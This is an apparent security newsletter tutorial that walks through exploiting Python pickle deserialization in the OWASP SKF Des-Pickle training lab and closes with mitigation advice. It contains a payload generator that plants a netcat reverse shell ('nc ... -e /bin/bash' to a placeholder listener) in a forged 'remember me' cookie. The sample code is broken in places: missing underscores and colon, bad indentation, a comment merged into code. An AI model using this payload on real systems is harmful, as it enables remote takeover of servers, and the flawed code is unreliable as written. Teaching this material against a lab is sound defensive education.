Demystifing Security by Enciphers Edition #3

Welcome to the #3 Edition of Demystifying Security Newsletter!

In our previous newsletter, we understand in detail the fundamentals of serialization and deserialization, uncovering potential vulnerabilities that arise from improper handling of these processes.?

Now, we’ll take a step further and explore how these vulnerabilities can be exploited to gain Remote Code Execution (RCE), using a real-world example from the OWASP SKF Labs: Des-Pickle, an open-source lab environment. Follow these steps to set up the environment using Docker:

(Example of Python application performing deserialization and serialization)

Pull the Docker image:

$ sudo docker pull blabla1337/owasp-skf-lab:des-pickle

Run the sample web application on port 5000:

$ sudo docker run --rm -ti -p 5000:5000 blabla1337/owasp-skf-lab:des-pickle

This will launch the vulnerable web application, accessible at localhost:5000

Analyzing the Vulnerability

Upon accessing the application, you'll encounter a login panel. For penetration testers, this presents an opportunity to explore potential vulnerabilities, especially around user sessions and cookies.

1. Intercepting Cookies with Burp Suite:
2. Exploring "Remember Me" Functionality:
3. Identifying Serialization Format:

rememberme=gANjX19tYWluX18KdXNyCnEAKYFxAX1xAihYCAAAAHVzZXJuYW1lcQNYCQAAAEVuY2lwaGVyc3EEWAgAAABwYXNzd29yZHEFWAkAAABFbmNpcGhlcnNxBnViLg==        

• Utilize tools like "Whatweb" to determine backend technologies. It indicates Python 3 and suggests usage of the "pickle" module for serialization.

Identifying and Exploiting the Vulnerability

Python's "pickle" module is used for serialization in this case. Let's decipher the serialized object to understand its structure and exploit potential RCE:

1. Decoding and Deserializing:

import base64
import pickle
class usr:
pass
remember_me_cookie = "gANjX19tYWluX18KdXNyCnEAKYFxAX1xAihYCAAAAHVzZXJuYW1lcQNYCQAAAEVuY2lwaGVyc3EEWAgAAABwYXNzd29yZHEFWAkAAABFbmNpcGhlcnNxBnViLg=="

decoded_data = base64.b64decode(remember_me_cookie)

deserialized_data = pickle.loads(decoded_data)

print("Username:", deserialized_data.username)

print("Password:", deserialized_data.password)        

• The program will extract the 'username' and 'password' attributes from the unpickled object. Through this analysis, we can explore how the target server handles deserialization of cookies using Python's pickle module. Based on that, now we can craft our own serialized cookie with malicious payload.

Crafting Malicious Payloads:

• Exploit the deserialization process to execute malicious code. For example, create a command execution payload:

import base64
import pickle

class CommandExecutor:
  def reduce(self)
    import os
      return (os.system, ('nc listerner_ip listerner_port  -e "/bin/bash"',))

# Create an instance of CommandExecutor with the system command for a reverse shell 
malicious_object = CommandExecutor()

# Serialize the object into a byte stream 
malicious_byte_stream = pickle.dumps(malicious_object)

# Encode the byte stream into base64 to create the 
malicious payload malicious_payload = base64.b64encode(malicious_byte_stream).decode('utf-8') print(malicious_payload)        

• Utilizing the Python code will generate the malicious serialized data.

2. Executing the Payload:

• Replace the legitimate "remember me" cookie with the crafted malicious payload using tools like Burp Suite.
• Upon deserialization on the server, the payload triggers, allowing the attacker to gain remote code execution.

Preventing Insecure Deserialization

To mitigate insecure deserialization vulnerabilities, developers should implement the following best practices:

• Avoid Untrusted Deserialization: Limit deserialization to trusted sources.
• Input Validation: Validate and sanitize user inputs rigorously.
• Use Secure Serialization Formats: Prefer safe formats like JSON over potentially risky ones like Java serialization.
• Digital Signatures: Employ digital signatures to validate data integrity before deserialization.

By following these practices, developers can significantly reduce the risk posed by insecure deserialization vulnerabilities in web applications. This approach ensures robust security against exploitation and protects sensitive data and systems from malicious attacks.

Note: The process of serialization and deserialization may differ from application to application.

Stay tuned for our next edition, and uncover real-world case studies.

Subscribe us for more insights into cybersecurity.